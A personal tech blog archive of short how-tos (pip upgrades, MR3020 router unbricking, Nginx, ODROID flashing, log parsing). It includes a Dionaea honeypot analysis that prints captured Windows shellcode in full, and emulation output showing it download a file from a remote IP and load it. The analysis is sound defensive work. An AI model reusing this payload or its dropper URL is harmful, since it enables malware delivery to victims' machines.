Category Archives: technique

Upgrade Python packages at using pip

As you read in the title above; to update your python packages via pip:

for Linux/*nix:

pip freeze --local | grep -v '^\-e' | cut -d = -f 1  | xargs -n1 pip install -U

p/s: you may need to run as sudo. Probably.

for Windows:

for /F "delims===" %i in ('pip freeze -l') do pip install -U %i

Credit: http://stackoverflow.com/questions/2720014/upgrading-all-packages-with-pip

Recover bricked TL-MR3020 via serial console


Recently, I’ve flashed my MR3020 in attempt to make my own Wifi Pineapple. But.. You know. Shit happen. :p

In other word, i screwed up my MR3020 and bricked it. All the LED is keep on blinking, some is on and not blinking, and the network is getting connected and disconnected randomly. Guess that’s a sign you’ve mess up with the device. XD

But I’m lucky because you still can recover the device via serial console and tftpd32 method. (yeay!)

Bear in mind that this method will VOID your warranty. So, don’t do this unless you willing to sacrifice for the sake of knowledge. ๐Ÿ™‚

Things that you need:

  • Tftpd32: A free tftp and dhcp server for windows, freeware tftp server. Very efficient for booting over LAN.
  • PuTTY: SSH and telnet client, free and open-source terminal emulator, serial console and network file transfer application.
  • USB to UART converter (3.3V). I’m using this converter that I bought at Cytron Technologies.
  • A 10K resistor
  • Female to Female OR Female to Male Jumper Wires

UC00B USB-UART Converter

UC00B USB-UART Converter


So, as you can see, my USB-UART converter come with 6 ways header pin for interfacing. The voltage selector must set to 3.3V since the TL-MR3020 router have its I/O pins working at 3.3V.

Connection Diagram
* Do not connect the router VCC to USB-UART VCC, it may break your adapter or your router

TL-MR3020   |    USB-UART   |    COLOR
------------|---------------|-----------
GND         |    GND        |    BLACK
RX          |    TXD        |    GREEN
TX          |    RXD        |   YELLOW

For the picture of the connection diagram, refer to first picture above.

No Serial Port
So, in my case, my MR3020 is version 1.9. As you can see picture above, mine doesn’t have any serial port to connect to using female jump wire. So I use female (attach to USB-UART) to male (attach to MR3020) as picture below:
Male Jump Wire to MR3020

Male Jump Wire to MR3020

Male Jump Wire to MR3020
Take note that I only put the resistor and jumper wire without soldering. You can do a soldering to your jump wire and resistor to the port with in this tutorial, I skip with that. :p

After you have all things in place, you can start installing the UC00B (USB-UART) driver to your computer. After finished, restart your computer, and check your Device Manager. You should see something like this:

UC00B USB-UART on Device Manager

UC00B USB-UART on Device Manager


which indicated that the driver and the converter is detected by computer and the driver is properly installed.

Setting up network IP address
Assign a static IP address to the computer, using IP address 192.168.1.2 since the router IP address is 192.168.1.1. No need for Internet connection in this process.

REMEMBER! Ensure that you have disable you windows firewall. Or else, the next step will might not work.

Install OpenWRT from the U-Boot console
Download the latest OpenWRT firmware and save it to C:\Program Files\Tftpd32 (Tftpd32 default installation folder) as shown in figure below:

TFTPD

TFTPD


You also can click the “Show Dir” button and check if the file is there or not.

Run Putty, select Serial option, on Serial Line, I’m using COM3 since my USB-UART driver detected as COM3, for Speed option, I use 115200. Then click Open. Example like picture below:

Putty example for Serial COM3

Putty example for Serial COM3

After that, power up your MR3020. On Putty console, you should see something like this:

U-Boot 1.1.4 (Aug 17 2012 - 15:21:03)
.
AP121 (ar9330) U-boot
.
DRAM:  32 MB
led turning on for 1s...
id read 0x100000ff
flash size 4194304, sector count = 64
Flash:  4 MB
Using default environment
.
In:    serial
Out:   serial
Err:   serial
Net:   ag7240_enet_initialize...
No valid address in Flash. Using fixed address
No valid address in Flash. Using fixed address
: cfg1 0x5 cfg2 0x7114
eth0: 00:03:7f:09:0b:ad
ag7240_phy_setup
eth0 up
: cfg1 0xf cfg2 0x7214
eth1: 00:03:7f:09:0b:ad
athrs26_reg_init_lan
ATHRS26: resetting s26
ATHRS26: s26 reset done
ag7240_phy_setup
eth1 up
eth0, eth1
Autobooting in 1 seconds

The moment after you see “Autobooting in 1 seconds“, type in word “tpl” immediately.

tpl
hornet>

If everything is correct, you should see “hornet>” in your console. if you missed it, close and open back your Putty, follow the instruction above until you see the word “hornet>

Now you are in U-Boot-console, as it shows “hornet>” on your console. Now enter the following commands:
setenv ipaddr is the MR3020 IP address,
setenv serverip is the computer IP address,

hornet> setenv ipaddr 192.168.1.1
hornet> setenv serverip 192.168.1.2

Then enter this command to download openwrt .bin file:

tftpboot 0x80000000 openwrt-ar71xx-generic-tl-mr3020-v1-squashfs-factory.bin

you should see something like this:

hornet> tftpboot 0x80000000 openwrt-ar71xx-generic-tl-mr3020-v1-squashfs-factory.bin
Using eth1 device
TFTP from server 192.168.1.2; our IP address is 192.168.1.1
Filename 'openwrt-ar71xx-generic-tl-mr3020-v1-squashfs-factory.bin'.
Load address: 0x80000000
Loading: #################################################################
         #################################################################
         #################################################################
         #################################################################
         #################################################################
         #################################################################
         #################################################################
         #################################################################
         #################################################################
         #################################################################
         #################################################################
         ######################################################
done
Bytes transferred = 3932160 (3c0000 hex)

Then enter this command to erase old firmware:

erase 0x9f020000 +0x3c0000

The output must be like this:

hornet> erase 0x9f020000 +0x3c0000
.
First 0x2 last 0x3d sector size 0x10000           61
Erased 60 sectors

Then enter this command to start flashing:

cp.b 0x80000000 0x9f020000 0x3c0000

And the output is:

hornet> cp.b 0x80000000 0x9f020000 0x3c0000
Copy to Flash... write addr: 9f020000
done

After that, lets try to boot to the new firmware:

bootm 9f020000

And the result is:

hornet> bootm 9f020000
## Booting image at 9f020000 ...
   Uncompressing Kernel Image ... OK
.
Starting kernel ...
### snip ###

And.. Thats it. You’ve recover you almost-dead MR3020 to life! ๐Ÿ™‚
The device new IP is at 192.168.1.1. Happy hacking!

  • Credit to this blog for this tutorial.

WordPress HTTP error on image upload (Nginx)

HTTP Error during image upload on wordpress

HTTP Error during image upload on wordpress

Recently, I’ve encountered this kind of problem. Maybe because it has been awhile I’m not uploading any images to my post. :p

Anyway, if you came out with this kind of error and using Nginx as your web engine, here how to solve it.

Add:

client_max_body_size 100m;

to your nginx .conf file.

For example, mine looks something like this:

server {
        listen 80;
        root /usr/share/nginx/www;
        index index.php index.html index.htm;
#
        fastcgi_buffers 8 16k;
        fastcgi_buffer_size 32k;
        fastcgi_read_timeout 180;
        client_max_body_size 100m;
#
        location / {

Hope it helps. ๐Ÿ™‚

Credit to aaronjholbrook

Disable IPv6 on Ubuntu

If you want to disable IPv6 on your server, below is the step to do it.

  1. Edit this file:
nano /etc/sysctl.conf
  1. Add these lines to the bottom of the file:
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1
  1. Run this command on your terminal:
sudo sysctl -p

Done!

Enable graphical root login on ubuntu 12.04

In Ubuntu, user “root” won’t show up as an options to login, which you need to adjust the Ubuntu to allow login as “root”.

Run this command below in your terminal (as normal user with sudo):

sudo passwd root
sudo sh -c 'echo "greeter-show-manual-login=true" >> /etc/lightdm/lightdm.conf'

Reboot and then you should be able to login as root using graphical user login.

Setting locale failed on Mac OS X Mavericks

If you using Mac OS X (in my case, I’m using Mavericks), during SSH session, you may see this kind of error in your terminal:

perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
    LANGUAGE = (unset),
    LC_ALL = (unset),
    LANG = "en_US.UTF-8"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").

To solve this, edit .bash_profile file in your host/local machine

sudo nano ~/.bash_profile

and add this line:

export LC_CTYPE=en_US.UTF-8
export LC_ALL=en_US.UTF-8

CREDIT TO : Agile Faqs

Dionaea simple analysis

Dionaea exploit analysis

For this analysis, we’ll using python3 that bundled with Dionaea:

/opt/dionaea/bin/python3

Running command above will open a python console. Enter the code below line by line:

f = open('/tmp/test.bin','wb+')
f.write(b'\\\x00EJinvSWwBRCQvkpxpigFPYgLEznJUFvXdgKGNqynVDlchFrVWzDhuvssAiCzTVCXwMERZNFfiqOpAyLjJojswpKHzIwBaYQMAxYe\xe8\xff\xff\xff\xff\xc2_\x8dO\x10\x801\xc4Af\x819MSu\xf58\xae\xc6\x9d\xa0O\x85\xeaO\x84\xc8O\x84\xd8O\xc4O\x9c\xccIse\xc4\xc4\xc4,\xed\xc4\xc4\xc4\x94&<O8\x92;\xd3WG\x02\xc3,\xdc\xc4\xc4\xc4\xf7\x16\x96\x96O\x08\xa2\x03\xc5\xbc\xea\x95;\xb3\xc0\x96\x96\x95\x92\x96;\xf3;$i\x95\x92QO\x8f\xf8O\x88\xcf\xbc\xc7\x0f\xf72I\xd0w\xc7\x95\xe4O\xd6\xc7\x17\xcb\xc4\x04\xcb{\x04\x05\x04\xc3\xf6\xc6\x86D\xfe\xc4\xb11\xff\x01\xb0\xc2\x82\xff\xb5\xdc\xb6\x1fO\x95\xe0\xc7\x17\xcbs\xd0\xb6O\x85\xd8\xc7\x07O\xc0T\xc7\x07\x9a\x9d\x07\xa4fN\xb2\xe2Dh\x0c\xb1\xb6\xa8\xa9\xab\xaa\xc4]\xe7\x99\x1d\xac\xb0\xb0\xb4\xfe\xeb\xeb\xf5\xfc\xfc\xea\xf6\xf0\xf1\xea\xf7\xf6\xea\xf6\xf5\xf4\xfe\xfc\xf5\xf0\xf3\xeb\xaf\xa7\xa2\xa8\xc4MSemnHqZkZyHIFmbZQCywHscutahhWhoSewiPdNFaPfofpeZVQgyybFqBlGSeBYAPgirfoIOMFQCVIOhuNxscDcxyqJfxgMhahsgjEvYZWarkAkGUWFEWHrnRvYCubVUJnOgsKyupLJGkVCRQwYGcQPSuIsYJmBSVIcLnDXRxnDOkAvmXjHktND\\\x00.\x00.\x00\\\x00.\x00.\x00\\\x00A\x00I\x00O\x00J\x00L\x00P\x00D\x00\x08\x04\x02\x00$\xcb\x01xVFAS$\xcb\x01xSNKBQTVPYYTZISATHHFZEPMNQBWWBDGZDXJNVJAZLX\x92J$\xb6\x97\x03\xf57\xebZRQNXKFGQWT\x00\x00')
f.close()
exit()</script>

It will produce test.bin file in /tmp/ folder.

Now we analyze it and dump the output to another file:

/opt/dionaea/bin/sctest -S -g -v -s 1000000 < /tmp/test.bin >> test.txt

You should see something like this:

[email protected]:~# cat test.txt
verbose = 1
success offset = 0x00000068
[emu 0x0xac40e0 info ] The following function is a stub instr_sldt_0f00 functions/misc.c:290
<snip>
Hook me Captain Cook!
userhooks.c:132 user_hook_ExitThread
ExitThread(0)
stepcount 85067
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417116 =>
           = "urlmon";
) = 0x7df20000;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
         none;
     LPCTSTR szURL = 0x00417121 =>
           = "http://188.245.32.210:8147/kcfl";
     LPCTSTR szFileName = 0x00416fbe =>
           = "x.";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00416fbe =>
           = "x.";
) = 0x00000000;
void ExitThread (
     DWORD dwExitCode = 0;
) =  0;

As you can see, the malicious URL is hxxp://188.245.32.210:8147/kcfl

Reference : https://sourceforge.net/p/nepenthes/mailman/message/26862416/

Remove .svn folder from Github repo

For those who are using Github services, and pushing their code via terminal, you may encounter this problem where you will see a folder named .svn on each folder of your code.

So if you want to delete this folder, follow this step below:

First, pull your code from Github to your computer:

git pull origin master

Then, use this command to find folder .svn and delete it:

find . -name '.svn' | xargs git rm -rf --ignore-unmatch

Last, push your code back to Github server:

git push origin master

ODROID U2 – Flashing Images on Mac OS X

  1. Download the image of the OS you want to boot on your ODROID to the local disk of your Mac

  2. If the Image is compressed, unpack it (if it is in ‘.xz’ format you need a tool like The Unarchiver to be able to unpack it)

  3. Insert your SD card and check the currently mounted filesystems

gh0st:Downloads zer0$ df -h
Filesystem      Size   Used  Avail Capacity  iused    ifree %iused  Mounted on
/dev/disk0s2   371Gi  270Gi  100Gi    73% 70913436 26254530   73%   /
devfs          200Ki  200Ki    0Bi   100%      694        0  100%   /dev
map -hosts       0Bi    0Bi    0Bi   100%        0        0  100%   /net
map auto_home    0Bi    0Bi    0Bi   100%        0        0  100%   /home
/dev/disk1s1   7.4Gi  2.5Mi  7.4Gi     1%        0        0  100%   /Volumes/UNTITLED

*Note the name of the filesystem that Mac OS X assigned to the mounted SD card (in my case /dev/disk2s1)

  1. Unmount that filesystem so that you will be allowed to overwrite the disk:
gh0st:Downloads zer0$ sudo diskutil unmount /dev/disk1s1
Volume UNTITLED on disk1s1 unmounted
  1. Using the device name of the filesystem work out the raw device name for the entire SD card, by omitting the final “s1” and replacing “disk” with “rdisk” (Important: you will lose all data on the hard drive on your computer if you get the wrong device name). Make sure the device name is the name of the whole SD card as described above, not just a partition of it (for example, rdisk3, not rdisk3s1. Similarly you might have another SD drive name/number like rdisk2 or rdisk4, etc. — recheck by using the df -h command both before & after you insert your SD card reader into your Mac if you have any doubts!):
    In my case, since the device name of the mounted filesystem is /dev/disk2s1 the entire SD card has the device name /dev/rdisk2

  2. Write the image to the card with the dd command, using the raw disk device name from above (read carefully the above step, to be sure you use the correct rdisk# here!)

gh0st:Downloads zer0$ sudo dd bs=1m if=odroid-debian-wheezy-u2.img of=/dev/rdisk1
7260+0 records in
7260+0 records out
7612661760 bytes transferred in 709.578823 secs (10728423 bytes/sec)

*(note that dd will not output any information until there is an error or it is finished)

  1. When dd finished successfully it will display some information and the SD card will be re-mounted. You can now eject the card:
gh0st:Downloads zer0$ sudo diskutil eject /dev/rdisk1
Disk /dev/rdisk1 ejected
  1. Remove the SD card from the card reader and put it in the ODROID to boot your new OS image

Extract unique IP address from Apache & Nginx log file

Lets say you wanted to count the number of unique IP addresses hitting your Apache server. Itโ€™s very easy to do in a Linux (or compatible) shell. In this tutorial, Iโ€™m using Ubuntu server.

First, locate the log file that you want to extract. For example, apache2 log file is located at /var/log/apache2 (depending on your distro). For nginx, the log file is located at /var/log/nginx.

Here I give you the first example on how to extract & count unique IP address in Nginx log file.

Nginx Access Log file

Nginx Error Log file

Next, is the step on how to extract & count unique IP address from Apache log file.
Apache access & error log file

Apache Access Log file

Apache Error Log file

If you have any other step, you can share with me in the comment section. Hope it helps! ๐Ÿ™‚